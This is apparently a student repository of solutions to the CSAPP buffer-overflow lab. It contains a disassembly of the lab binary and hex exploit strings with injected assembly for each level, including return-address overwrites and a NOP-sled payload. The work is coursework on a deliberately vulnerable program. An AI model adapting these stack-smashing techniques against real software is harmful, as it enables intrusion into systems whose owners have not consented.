8049a6f: e8 9c ee ff ff call 8048910 1350 | 8049a74: b8 00 00 00 00 mov $0x0,%eax 1351 | 8049a79: b9 ff ff ff ff mov $0xffffffff,%ecx 1352 | 8049a7e: f2 ae repnz scas %es:(%edi),%al 1353 | 8049a80: f7 d1 not %ecx 1354 | 8049a82: 83 e9 01 sub $0x1,%ecx 1355 | 8049a85: 0f 84 e6 fc ff ff je 8049771 1356 | 8049a8b: 89 cb mov %ecx,%ebx 1357 | 8049a8d: 8d b5 cc bf ff ff lea -0x4034(%ebp),%esi 1358 | 8049a93: 89 8d b0 5f ff ff mov %ecx,-0xa050(%ebp) 1359 | 8049a99: 8b bd b4 5f ff ff mov -0xa04c(%ebp),%edi 1360 | 8049a9f: e9 33 fc ff ff jmp 80496d7 1361 | 8049aa4: 8b 7d 20 mov 0x20(%ebp),%edi 1362 | 8049aa7: be a8 a4 04 08 mov $0x804a4a8,%esi 1363 | 8049aac: b8 43 00 00 00 mov $0x43,%eax 1364 | 8049ab1: f7 c7 01 00 00 00 test $0x1,%edi 1365 | 8049ab7: 74 19 je 8049ad2 1366 | 8049ab9: 0f b6 05 a8 a4 04 08 movzbl 0x804a4a8,%eax 1367 | 8049ac0: 88 07 mov %al,(%edi) 1368 | 8049ac2: 8b 45 20 mov 0x20(%ebp),%eax 1369 | 8049ac5: 8d 78 01 lea 0x1(%eax),%edi 1370 | 8049ac8: be a9 a4 04 08 mov $0x804a4a9,%esi 1371 | 8049acd: b8 42 00 00 00 mov $0x42,%eax 1372 | 8049ad2: f7 c7 02 00 00 00 test $0x2,%edi 1373 | 8049ad8: 74 0f je 8049ae9 1374 | 8049ada: 0f b7 16 movzwl (%esi),%edx 1375 | 8049add: 66 89 17 mov %dx,(%edi) 1376 | 8049ae0: 83 c7 02 add $0x2,%edi 1377 | 8049ae3: 83 c6 02 add $0x2,%esi 1378 | 8049ae6: 83 e8 02 sub $0x2,%eax 1379 | 8049ae9: 89 c1 mov %eax,%ecx 1380 | 8049aeb: c1 e9 02 shr $0x2,%ecx 1381 | 8049aee: f3 a5 rep movsl %ds:(%esi),%es:(%edi) 1382 | 8049af0: ba 00 00 00 00 mov $0x0,%edx 1383 | 8049af5: a8 02 test $0x2,%al 1384 | 8049af7: 74 0b je 8049b04 1385 | 8049af9: 0f b7 16 movzwl (%esi),%edx 1386 | 8049afc: 66 89 17 mov %dx,(%edi) 1387 | 8049aff: ba 02 00 00 00 mov $0x2,%edx 1388 | 8049b04: a8 01 test $0x1,%al 1389 | 8049b06: 74 07 je 8049b0f 1390 | 8049b08: 0f b6 04 16 movzbl (%esi,%edx,1),%eax 1391 | 8049b0c: 88 04 17 mov %al,(%edi,%edx,1) 1392 | 8049b0f: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1393 | 8049b15: 89 04 24 mov %eax,(%esp) 1394 | 8049b18: e8 43 ee ff ff call 8048960 1395 | 8049b1d: b8 ff ff ff ff mov $0xffffffff,%eax 1396 | 8049b22: 81 c4 6c a0 00 00 add $0xa06c,%esp 1397 | 8049b28: 5b pop %ebx 1398 | 8049b29: 5e pop %esi 1399 | 8049b2a: 5f pop %edi 1400 | 8049b2b: 5d pop %ebp 1401 | 8049b2c: c3 ret 1402 | 1403 | 08049b2d : 1404 | 8049b2d: 55 push %ebp 1405 | 8049b2e: 89 e5 mov %esp,%ebp 1406 | 8049b30: 53 push %ebx 1407 | 8049b31: 83 ec 14 sub $0x14,%esp 1408 | 8049b34: 8b 5d 08 mov 0x8(%ebp),%ebx 1409 | 8049b37: 85 db test %ebx,%ebx 1410 | 8049b39: 74 26 je 8049b61 1411 | 8049b3b: 85 db test %ebx,%ebx 1412 | 8049b3d: b8 02 00 00 00 mov $0x2,%eax 1413 | 8049b42: 0f 48 d8 cmovs %eax,%ebx 1414 | 8049b45: c7 44 24 04 b0 92 04 movl $0x80492b0,0x4(%esp) 1415 | 8049b4c: 08 1416 | 8049b4d: c7 04 24 0e 00 00 00 movl $0xe,(%esp) 1417 | 8049b54: e8 57 ec ff ff call 80487b0 1418 | 8049b59: 89 1c 24 mov %ebx,(%esp) 1419 | 8049b5c: e8 5f ec ff ff call 80487c0 1420 | 8049b61: 83 c4 14 add $0x14,%esp 1421 | 8049b64: 5b pop %ebx 1422 | 8049b65: 5d pop %ebp 1423 | 8049b66: c3 ret 1424 | 1425 | 08049b67 : 1426 | 8049b67: 55 push %ebp 1427 | 8049b68: 89 e5 mov %esp,%ebp 1428 | 8049b6a: 57 push %edi 1429 | 8049b6b: 56 push %esi 1430 | 8049b6c: 53 push %ebx 1431 | 8049b6d: 83 ec 2c sub $0x2c,%esp 1432 | 8049b70: 8b 75 08 mov 0x8(%ebp),%esi 1433 | 8049b73: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1434 | 8049b7a: 00 1435 | 8049b7b: c7 04 24 0d 00 00 00 movl $0xd,(%esp) 1436 | 8049b82: e8 29 ec ff ff call 80487b0 1437 | 8049b87: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1438 | 8049b8e: 00 1439 | 8049b8f: c7 04 24 1d 00 00 00 movl $0x1d,(%esp) 1440 | 8049b96: e8 15 ec ff ff call 80487b0 1441 | 8049b9b: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1442 | 8049ba2: 00 1443 | 8049ba3: c7 04 24 1d 00 00 00 movl $0x1d,(%esp) 1444 | 8049baa: e8 01 ec ff ff call 80487b0 1445 | 8049baf: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 1446 | 8049bb6: 00 1447 | 8049bb7: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 1448 | 8049bbe: 00 1449 | 8049bbf: c7 04 24 02 00 00 00 movl $0x2,(%esp) 1450 | 8049bc6: e8 55 ed ff ff call 8048920 1451 | 8049bcb: 89 c3 mov %eax,%ebx 1452 | 8049bcd: 85 c0 test %eax,%eax 1453 | 8049bcf: 79 4e jns 8049c1f 1454 | 8049bd1: c7 06 45 72 72 6f movl $0x6f727245,(%esi) 1455 | 8049bd7: c7 46 04 72 3a 20 43 movl $0x43203a72,0x4(%esi) 1456 | 8049bde: c7 46 08 6c 69 65 6e movl $0x6e65696c,0x8(%esi) 1457 | 8049be5: c7 46 0c 74 20 75 6e movl $0x6e752074,0xc(%esi) 1458 | 8049bec: c7 46 10 61 62 6c 65 movl $0x656c6261,0x10(%esi) 1459 | 8049bf3: c7 46 14 20 74 6f 20 movl $0x206f7420,0x14(%esi) 1460 | 8049bfa: c7 46 18 63 72 65 61 movl $0x61657263,0x18(%esi) 1461 | 8049c01: c7 46 1c 74 65 20 73 movl $0x73206574,0x1c(%esi) 1462 | 8049c08: c7 46 20 6f 63 6b 65 movl $0x656b636f,0x20(%esi) 1463 | 8049c0f: 66 c7 46 24 74 00 movw $0x74,0x24(%esi) 1464 | 8049c15: b8 ff ff ff ff mov $0xffffffff,%eax 1465 | 8049c1a: e9 dd 00 00 00 jmp 8049cfc 1466 | 8049c1f: c7 04 24 30 a5 04 08 movl $0x804a530,(%esp) 1467 | 8049c26: e8 15 ed ff ff call 8048940 1468 | 8049c2b: 85 c0 test %eax,%eax 1469 | 8049c2d: 75 2a jne 8049c59 1470 | 8049c2f: c7 44 24 08 30 a5 04 movl $0x804a530,0x8(%esp) 1471 | 8049c36: 08 1472 | 8049c37: c7 44 24 04 d8 a3 04 movl $0x804a3d8,0x4(%esp) 1473 | 8049c3e: 08 1474 | 8049c3f: 89 34 24 mov %esi,(%esp) 1475 | 8049c42: e8 c9 ec ff ff call 8048910 1476 | 8049c47: 89 1c 24 mov %ebx,(%esp) 1477 | 8049c4a: e8 11 ed ff ff call 8048960 1478 | 8049c4f: b8 ff ff ff ff mov $0xffffffff,%eax 1479 | 8049c54: e9 a3 00 00 00 jmp 8049cfc 1480 | 8049c59: 8d 7d d8 lea -0x28(%ebp),%edi 1481 | 8049c5c: c7 45 d8 00 00 00 00 movl $0x0,-0x28(%ebp) 1482 | 8049c63: c7 45 dc 00 00 00 00 movl $0x0,-0x24(%ebp) 1483 | 8049c6a: c7 45 e0 00 00 00 00 movl $0x0,-0x20(%ebp) 1484 | 8049c71: c7 45 e4 00 00 00 00 movl $0x0,-0x1c(%ebp) 1485 | 8049c78: 66 c7 45 d8 02 00 movw $0x2,-0x28(%ebp) 1486 | 8049c7e: 8b 50 0c mov 0xc(%eax),%edx 1487 | 8049c81: 89 54 24 08 mov %edx,0x8(%esp) 1488 | 8049c85: 8d 55 dc lea -0x24(%ebp),%edx 1489 | 8049c88: 89 54 24 04 mov %edx,0x4(%esp) 1490 | 8049c8c: 8b 40 10 mov 0x10(%eax),%eax 1491 | 8049c8f: 8b 00 mov (%eax),%eax 1492 | 8049c91: 89 04 24 mov %eax,(%esp) 1493 | 8049c94: e8 57 eb ff ff call 80487f0 1494 | 8049c99: 66 c7 45 da 47 26 movw $0x2647,-0x26(%ebp) 1495 | 8049c9f: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 1496 | 8049ca6: 00 1497 | 8049ca7: 89 7c 24 04 mov %edi,0x4(%esp) 1498 | 8049cab: 89 1c 24 mov %ebx,(%esp) 1499 | 8049cae: e8 9d ec ff ff call 8048950 1500 | 8049cb3: 85 c0 test %eax,%eax 1501 | 8049cb5: 79 2f jns 8049ce6 1502 | 8049cb7: c7 44 24 0c 26 47 00 movl $0x4726,0xc(%esp) 1503 | 8049cbe: 00 1504 | 8049cbf: c7 44 24 08 30 a5 04 movl $0x804a530,0x8(%esp) 1505 | 8049cc6: 08 1506 | 8049cc7: c7 44 24 04 ec a4 04 movl $0x804a4ec,0x4(%esp) 1507 | 8049cce: 08 1508 | 8049ccf: 89 34 24 mov %esi,(%esp) 1509 | 8049cd2: e8 39 ec ff ff call 8048910 1510 | 8049cd7: 89 1c 24 mov %ebx,(%esp) 1511 | 8049cda: e8 81 ec ff ff call 8048960 1512 | 8049cdf: b8 ff ff ff ff mov $0xffffffff,%eax 1513 | 8049ce4: eb 16 jmp 8049cfc 1514 | 8049ce6: 89 1c 24 mov %ebx,(%esp) 1515 | 8049ce9: e8 72 ec ff ff call 8048960 1516 | 8049cee: 66 c7 06 4f 4b movw $0x4b4f,(%esi) 1517 | 8049cf3: c6 46 02 00 movb $0x0,0x2(%esi) 1518 | 8049cf7: b8 00 00 00 00 mov $0x0,%eax 1519 | 8049cfc: 83 c4 2c add $0x2c,%esp 1520 | 8049cff: 5b pop %ebx 1521 | 8049d00: 5e pop %esi 1522 | 8049d01: 5f pop %edi 1523 | 8049d02: 5d pop %ebp 1524 | 8049d03: c3 ret 1525 | 1526 | 08049d04 : 1527 | 8049d04: 55 push %ebp 1528 | 8049d05: 89 e5 mov %esp,%ebp 1529 | 8049d07: 53 push %ebx 1530 | 8049d08: 83 ec 24 sub $0x24,%esp 1531 | 8049d0b: 8b 45 08 mov 0x8(%ebp),%eax 1532 | 8049d0e: 8b 5d 14 mov 0x14(%ebp),%ebx 1533 | 8049d11: 83 7d 10 00 cmpl $0x0,0x10(%ebp) 1534 | 8049d15: 74 23 je 8049d3a 1535 | 8049d17: 8b 45 0c mov 0xc(%ebp),%eax 1536 | 8049d1a: 89 44 24 04 mov %eax,0x4(%esp) 1537 | 8049d1e: c7 04 24 3d a5 04 08 movl $0x804a53d,(%esp) 1538 | 8049d25: e8 66 ea ff ff call 8048790 1539 | 8049d2a: 66 c7 03 4f 4b movw $0x4b4f,(%ebx) 1540 | 8049d2f: c6 43 02 00 movb $0x0,0x2(%ebx) 1541 | 8049d33: b8 00 00 00 00 mov $0x0,%eax 1542 | 8049d38: eb 4c jmp 8049d86 1543 | 8049d3a: 85 c0 test %eax,%eax 1544 | 8049d3c: 74 3a je 8049d78 1545 | 8049d3e: 80 38 00 cmpb $0x0,(%eax) 1546 | 8049d41: 74 35 je 8049d78 1547 | 8049d43: 89 5c 24 18 mov %ebx,0x18(%esp) 1548 | 8049d47: 8b 55 0c mov 0xc(%ebp),%edx 1549 | 8049d4a: 89 54 24 14 mov %edx,0x14(%esp) 1550 | 8049d4e: c7 44 24 10 54 a5 04 movl $0x804a554,0x10(%esp) 1551 | 8049d55: 08 1552 | 8049d56: 89 44 24 0c mov %eax,0xc(%esp) 1553 | 8049d5a: c7 44 24 08 5b a5 04 movl $0x804a55b,0x8(%esp) 1554 | 8049d61: 08 1555 | 8049d62: c7 44 24 04 26 47 00 movl $0x4726,0x4(%esp) 1556 | 8049d69: 00 1557 | 8049d6a: c7 04 24 30 a5 04 08 movl $0x804a530,(%esp) 1558 | 8049d71: e8 63 f6 ff ff call 80493d9 1559 | 8049d76: eb 0e jmp 8049d86 1560 | 8049d78: 66 c7 03 4f 4b movw $0x4b4f,(%ebx) 1561 | 8049d7d: c6 43 02 00 movb $0x0,0x2(%ebx) 1562 | 8049d81: b8 00 00 00 00 mov $0x0,%eax 1563 | 8049d86: 83 c4 24 add $0x24,%esp 1564 | 8049d89: 5b pop %ebx 1565 | 8049d8a: 5d pop %ebp 1566 | 8049d8b: c3 ret 1567 | 1568 | 08049d8c : 1569 | 8049d8c: 55 push %ebp 1570 | 8049d8d: 89 e5 mov %esp,%ebp 1571 | 8049d8f: 8b 4d 08 mov 0x8(%ebp),%ecx 1572 | 8049d92: 0f b6 11 movzbl (%ecx),%edx 1573 | 8049d95: 84 d2 test %dl,%dl 1574 | 8049d97: 74 19 je 8049db2 1575 | 8049d99: b8 00 00 00 00 mov $0x0,%eax 1576 | 8049d9e: 6b c0 67 imul $0x67,%eax,%eax 1577 | 8049da1: 83 c1 01 add $0x1,%ecx 1578 | 8049da4: 0f be d2 movsbl %dl,%edx 1579 | 8049da7: 01 d0 add %edx,%eax 1580 | 8049da9: 0f b6 11 movzbl (%ecx),%edx 1581 | 8049dac: 84 d2 test %dl,%dl 1582 | 8049dae: 75 ee jne 8049d9e 1583 | 8049db0: eb 05 jmp 8049db7 1584 | 8049db2: b8 00 00 00 00 mov $0x0,%eax 1585 | 8049db7: 5d pop %ebp 1586 | 8049db8: c3 ret 1587 | 1588 | 08049db9 : 1589 | 8049db9: 55 push %ebp 1590 | 8049dba: 89 e5 mov %esp,%ebp 1591 | 8049dbc: 8b 55 08 mov 0x8(%ebp),%edx 1592 | 8049dbf: 89 d1 mov %edx,%ecx 1593 | 8049dc1: c1 e9 1c shr $0x1c,%ecx 1594 | 8049dc4: b8 00 00 00 00 mov $0x0,%eax 1595 | 8049dc9: 85 c9 test %ecx,%ecx 1596 | 8049dcb: 74 2f je 8049dfc 1597 | 8049dcd: 80 fa 0a cmp $0xa,%dl 1598 | 8049dd0: 74 17 je 8049de9 1599 | 8049dd2: b9 08 00 00 00 mov $0x8,%ecx 1600 | 8049dd7: 89 d0 mov %edx,%eax 1601 | 8049dd9: d3 e8 shr %cl,%eax 1602 | 8049ddb: 3c 0a cmp $0xa,%al 1603 | 8049ddd: 74 11 je 8049df0 1604 | 8049ddf: 83 c1 08 add $0x8,%ecx 1605 | 8049de2: 83 f9 20 cmp $0x20,%ecx 1606 | 8049de5: 75 f0 jne 8049dd7 1607 | 8049de7: eb 0e jmp 8049df7 1608 | 8049de9: b8 00 00 00 00 mov $0x0,%eax 1609 | 8049dee: eb 0c jmp 8049dfc 1610 | 8049df0: b8 00 00 00 00 mov $0x0,%eax 1611 | 8049df5: eb 05 jmp 8049dfc 1612 | 8049df7: b8 01 00 00 00 mov $0x1,%eax 1613 | 8049dfc: 5d pop %ebp 1614 | 8049dfd: c3 ret 1615 | 1616 | 08049dfe : 1617 | 8049dfe: 55 push %ebp 1618 | 8049dff: 89 e5 mov %esp,%ebp 1619 | 8049e01: 53 push %ebx 1620 | 8049e02: 83 ec 14 sub $0x14,%esp 1621 | 8049e05: 8b 45 08 mov 0x8(%ebp),%eax 1622 | 8049e08: 89 04 24 mov %eax,(%esp) 1623 | 8049e0b: e8 7c ff ff ff call 8049d8c 1624 | 8049e10: 89 04 24 mov %eax,(%esp) 1625 | 8049e13: e8 48 ea ff ff call 8048860 1626 | 8049e18: e8 d3 ea ff ff call 80488f0 1627 | 8049e1d: 89 c3 mov %eax,%ebx 1628 | 8049e1f: 89 04 24 mov %eax,(%esp) 1629 | 8049e22: e8 92 ff ff ff call 8049db9 1630 | 8049e27: 85 c0 test %eax,%eax 1631 | 8049e29: 74 ed je 8049e18 1632 | 8049e2b: 89 d8 mov %ebx,%eax 1633 | 8049e2d: 83 c4 14 add $0x14,%esp 1634 | 8049e30: 5b pop %ebx 1635 | 8049e31: 5d pop %ebp 1636 | 8049e32: c3 ret 1637 | 8049e33: 66 90 xchg %ax,%ax 1638 | 8049e35: 66 90 xchg %ax,%ax 1639 | 8049e37: 66 90 xchg %ax,%ax 1640 | 8049e39: 66 90 xchg %ax,%ax 1641 | 8049e3b: 66 90 xchg %ax,%ax 1642 | 8049e3d: 66 90 xchg %ax,%ax 1643 | 8049e3f: 90 nop 1644 | 1645 | 08049e40 <__libc_csu_init>: 1646 | 8049e40: 55 push %ebp 1647 | 8049e41: 57 push %edi 1648 | 8049e42: 31 ff xor %edi,%edi 1649 | 8049e44: 56 push %esi 1650 | 8049e45: 53 push %ebx 1651 | 8049e46: e8 65 eb ff ff call 80489b0 <__x86.get_pc_thunk.bx> 1652 | 8049e4b: 81 c3 b5 21 00 00 add $0x21b5,%ebx 1653 | 8049e51: 83 ec 1c sub $0x1c,%esp 1654 | 8049e54: 8b 6c 24 30 mov 0x30(%esp),%ebp 1655 | 8049e58: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi 1656 | 8049e5e: e8 d9 e8 ff ff call 804873c <_init> 1657 | 8049e63: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax 1658 | 8049e69: 29 c6 sub %eax,%esi 1659 | 8049e6b: c1 fe 02 sar $0x2,%esi 1660 | 8049e6e: 85 f6 test %esi,%esi 1661 | 8049e70: 74 27 je 8049e99 <__libc_csu_init+0x59> 1662 | 8049e72: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 1663 | 8049e78: 8b 44 24 38 mov 0x38(%esp),%eax 1664 | 8049e7c: 89 2c 24 mov %ebp,(%esp) 1665 | 8049e7f: 89 44 24 08 mov %eax,0x8(%esp) 1666 | 8049e83: 8b 44 24 34 mov 0x34(%esp),%eax 1667 | 8049e87: 89 44 24 04 mov %eax,0x4(%esp) 1668 | 8049e8b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 1669 | 8049e92: 83 c7 01 add $0x1,%edi 1670 | 8049e95: 39 f7 cmp %esi,%edi 1671 | 8049e97: 75 df jne 8049e78 <__libc_csu_init+0x38> 1672 | 8049e99: 83 c4 1c add $0x1c,%esp 1673 | 8049e9c: 5b pop %ebx 1674 | 8049e9d: 5e pop %esi 1675 | 8049e9e: 5f pop %edi 1676 | 8049e9f: 5d pop %ebp 1677 | 8049ea0: c3 ret 1678 | 8049ea1: eb 0d jmp 8049eb0 <__libc_csu_fini> 1679 | 8049ea3: 90 nop 1680 | 8049ea4: 90 nop 1681 | 8049ea5: 90 nop 1682 | 8049ea6: 90 nop 1683 | 8049ea7: 90 nop 1684 | 8049ea8: 90 nop 1685 | 8049ea9: 90 nop 1686 | 8049eaa: 90 nop 1687 | 8049eab: 90 nop 1688 | 8049eac: 90 nop 1689 | 8049ead: 90 nop 1690 | 8049eae: 90 nop 1691 | 8049eaf: 90 nop 1692 | 1693 | 08049eb0 <__libc_csu_fini>: 1694 | 8049eb0: f3 c3 repz ret 1695 | 8049eb2: 66 90 xchg %ax,%ax 1696 | 1697 | Disassembly of section .fini: 1698 | 1699 | 08049eb4 <_fini>: 1700 | 8049eb4: 53 push %ebx 1701 | 8049eb5: 83 ec 08 sub $0x8,%esp 1702 | 8049eb8: e8 f3 ea ff ff call 80489b0 <__x86.get_pc_thunk.bx> 1703 | 8049ebd: 81 c3 43 21 00 00 add $0x2143,%ebx 1704 | 8049ec3: 83 c4 08 add $0x8,%esp 1705 | 8049ec6: 5b pop %ebx 1706 | 8049ec7: c3 ret 1707 | -------------------------------------------------------------------------------- /buflab-handout.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/buflab-handout.tar -------------------------------------------------------------------------------- /buflab.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/buflab.pdf -------------------------------------------------------------------------------- /hex2raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/hex2raw -------------------------------------------------------------------------------- /level0_smoke/smoke_U201315075.txt: -------------------------------------------------------------------------------- 1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 8b 04 08 2 | -------------------------------------------------------------------------------- /level1_fizz/fizz_U201315075.txt: -------------------------------------------------------------------------------- 1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 8b 04 08 00 00 00 00 26 05 8f 2d 2 | -------------------------------------------------------------------------------- /level2_bang/bang.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level2_bang/bang.o -------------------------------------------------------------------------------- /level2_bang/bang.s: -------------------------------------------------------------------------------- 1 | movl $0x2d8f0526, 0x0804d100 2 | pushl $0x08048bc5 3 | ret 4 | -------------------------------------------------------------------------------- /level2_bang/bang_U201315075.txt: -------------------------------------------------------------------------------- 1 | c7 05 00 d1 04 08 26 05 8f 2d 68 c5 8b 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 34 68 55 2 | -------------------------------------------------------------------------------- /level3_bomb/bomb.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level3_bomb/bomb.o -------------------------------------------------------------------------------- /level3_bomb/bomb.s: -------------------------------------------------------------------------------- 1 | movl $0x2d8f0526,%eax 2 | push $0x08048cd6 3 | ret 4 | -------------------------------------------------------------------------------- /level3_bomb/bomb2.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level3_bomb/bomb2.o -------------------------------------------------------------------------------- /level3_bomb/bomb2.s: -------------------------------------------------------------------------------- 1 | movl $0x2d8f0526,%eax 2 | movl $0x55683490,%ebp 3 | push $0x08048cd6 4 | ret 5 | -------------------------------------------------------------------------------- /level3_bomb/bomb2_U201315075.txt: -------------------------------------------------------------------------------- 1 | b8 26 05 8f 2d bd 90 34 68 55 68 d6 8c 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 34 68 55 2 | -------------------------------------------------------------------------------- /level3_bomb/bomb_U201315075.txt: -------------------------------------------------------------------------------- 1 | b8 26 05 8f 2d 68 d6 8c 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 34 68 55 38 34 68 55 2 | -------------------------------------------------------------------------------- /level4_nitro/nitro.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level4_nitro/nitro.o -------------------------------------------------------------------------------- /level4_nitro/nitro.s: -------------------------------------------------------------------------------- 1 | mov $0x2d8f0526,%eax 2 | lea 0x28(%esp),%ebp 3 | push $0x08048d42 4 | ret 5 | -------------------------------------------------------------------------------- /level4_nitro/nitro_U201315075.txt: -------------------------------------------------------------------------------- 1 | 90 90 90 90 90 90 90 90 90 90 2 | 90 90 90 90 90 90 90 90 90 90 3 | 90 90 90 90 90 90 90 90 90 90 4 | 90 90 90 90 90 90 90 90 90 90 5 | 90 90 90 90 90 90 90 90 90 90 6 | 90 90 90 90 90 90 90 90 90 90 7 | 90 90 90 90 90 90 90 90 90 90 8 | 90 90 90 90 90 90 90 90 90 90 9 | 90 90 90 90 90 90 90 90 90 90 10 | 90 90 90 90 90 90 90 90 90 90 11 | 12 | 90 90 90 90 90 90 90 90 90 90 13 | 90 90 90 90 90 90 90 90 90 90 14 | 90 90 90 90 90 90 90 90 90 90 15 | 90 90 90 90 90 90 90 90 90 90 16 | 90 90 90 90 90 90 90 90 90 90 17 | 90 90 90 90 90 90 90 90 90 90 18 | 90 90 90 90 90 90 90 90 90 90 19 | 90 90 90 90 90 90 90 90 90 90 20 | 90 90 90 90 90 90 90 90 90 90 21 | 90 90 90 90 90 90 90 90 90 90 22 | 23 | 90 90 90 90 90 90 90 90 90 90 24 | 90 90 90 90 90 90 90 90 90 90 25 | 90 90 90 90 90 90 90 90 90 90 26 | 90 90 90 90 90 90 90 90 90 90 27 | 90 90 90 90 90 90 90 90 90 90 28 | 90 90 90 90 90 90 90 90 90 90 29 | 90 90 90 90 90 90 90 90 90 90 30 | 90 90 90 90 90 90 90 90 90 90 31 | 90 90 90 90 90 90 90 90 90 90 32 | 90 90 90 90 90 90 90 90 90 90 33 | 34 | 90 90 90 90 90 90 90 90 90 90 35 | 90 90 90 90 90 90 90 90 90 90 36 | 90 90 90 90 90 90 90 90 90 90 37 | 90 90 90 90 90 90 90 90 90 90 38 | 90 90 90 90 90 90 90 90 90 90 39 | 90 90 90 90 90 90 90 90 90 90 40 | 90 90 90 90 90 90 90 90 90 90 41 | 90 90 90 90 90 90 90 90 90 90 42 | 90 90 90 90 90 90 90 90 90 90 43 | 90 90 90 90 90 90 90 90 90 90 44 | 45 | 90 90 90 90 90 90 90 90 90 90 46 | 90 90 90 90 90 90 90 90 90 90 47 | 90 90 90 90 90 90 90 90 90 90 48 | 90 90 90 90 90 90 90 90 90 90 49 | 90 90 90 90 90 90 90 90 90 90 50 | 90 90 90 90 90 90 90 90 90 90 51 | 90 90 90 90 90 90 90 90 90 90 52 | 90 90 90 90 90 90 90 90 90 90 53 | 90 90 90 90 90 90 90 90 90 90 54 | 90 90 90 90 90 90 90 90 90 90 55 | 56 | 90 90 90 90 90 90 90 90 90 b8 57 | 26 05 8f 2d 8d 6c 24 28 68 42 58 | 8d 04 08 c3 c8 32 68 55 59 | -------------------------------------------------------------------------------- /makecookie: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/makecookie --------------------------------------------------------------------------------